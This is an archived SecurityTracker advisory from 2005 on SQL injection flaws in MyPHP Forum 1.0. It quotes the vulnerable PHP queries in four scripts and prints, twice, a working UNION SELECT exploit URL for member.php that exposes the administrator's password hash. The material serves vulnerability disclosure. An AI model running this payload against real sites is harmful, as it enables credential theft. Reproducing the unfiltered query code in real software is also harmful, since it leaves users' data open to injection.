SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   MyPHP Forum Vendors:   myphp.ws
MyPHP Forum Input Validation Holes Let Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1013136
SecurityTracker URL:  http://securitytracker.com/id/1013136
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 9 2005
Impact:   Disclosure of system information, Disclosure of user information
Exploit Included:  Yes  
Version(s): 1.0
Description:   A vulnerability was reported in MyPHP Forum. A remote user can inject SQL commands.

Several scripts do not properly validate user-supplied input in certain fields. A remote user can supply a specially crafted input to execute SQL commands on the underlying database. This flaw can be exploited if 'magic_quotes_gpc' is off.

The 'forum.php' script does not properly validate user-supplied input in the 'fid' parameter.

The 'member.php' script does not properly validate user-supplied input in the 'member' parameter. A demonstration exploit URL is provided:

member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig,
regdate, posts, password as yahoo FROM nb_member WHERE uid='1

The 'forgot.php' script does not properly validate user-supplied input in the 'email' parameter.

The 'include.php' script does not properly validate user-supplied input in the 'nbuser' and 'nbpass' parameters.

foster GHC reported these flaws.

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.myphp.ws/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Several SQL injection bugs in myPHP Forum v.1.0




/*==========================================*/
// GHC -> MyPHP Forum <- ADVISORY
// Product: MyPHP Forum
// Version: 1.0
// URL: http://www.myphp.ws
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[Product Description]
MyPHP Forum is a simple message board script with limited features.

[Summary]
Several SQL Injection vulnerabilities may lead to viewing of sensetive information,
including hash of user's password.

[Details]
Positive part of user outbound variables used as they are in SQL queries.

[1] script name: forum.php

---[code]---
$query = mysql_query("SELECT fid, name FROM $db_forum WHERE fid='$fid'") or die(mysql_error());
$nav = mysql_fetch_array($query);
---[/code]---

Possible SQL injection through $fid variable that has no filtration.

[2] script name: member.php

---[code]---
if($action == "viewpro") {
        $member = $HTTP_GET_VARS['member'];
        $sql =  "SELECT * FROM $db_member WHERE username='$member'";
        $query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die("cant execute $sql");
        $member = mysql_fetch_array($query);
---[/code]---

SQL code injection 
member.php?action=viewpro&member=[SQL code]

[example of exploit]
member.php?action=viewpro&member=nonexist' UNION SELECT uid, username, password, status, email, website, aim, msn, location, sig,
 regdate, posts, password as yahoo FROM nb_member WHERE uid='1
will show administrator's name and password hash (in the "Yahoo" field).  

Password cripted by encrypt() function:
-[code]-
function encrypt($string) {
    $crypted = crypt(md5($string), md5($string));
    return $crypted;
}
-[/code]-

[3] script name: forgot.php

---[code]---
$email = $_REQUEST['email'];
        if (isset($email)) {
        $sql="SELECT * FROM $db_member WHERE email='$email'";  
...
$result = mysql_query("SELECT username FROM $db_member WHERE email='$email'");
                        $username = mysql_result($result, 0);
                        $msg = "
                        Hello $username,
---[code]---
$email variable has no filtration. 
IMPACT: Possible SQL injection through this variable.

[4] script name: include.php
This is the most important script that is the part of all others.
$nbuser & $nbpass variables are not filtering. 

---[code]---
$query = mysql_query("SELECT * FROM $db_member WHERE username='$nbuser'")
---[/code]---
IMPACT: possible SQL injection through $nbuser.

P.S. all bugs are actual for magic_quotes_gpc=0.

/* ================================================== */
/* www.ghc.ru -- security games & challenges          */
/* ================================================== */
/* greets to: RST.void.ru, D0G4 & all quest hunters %)*/
/* ================================================== */

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC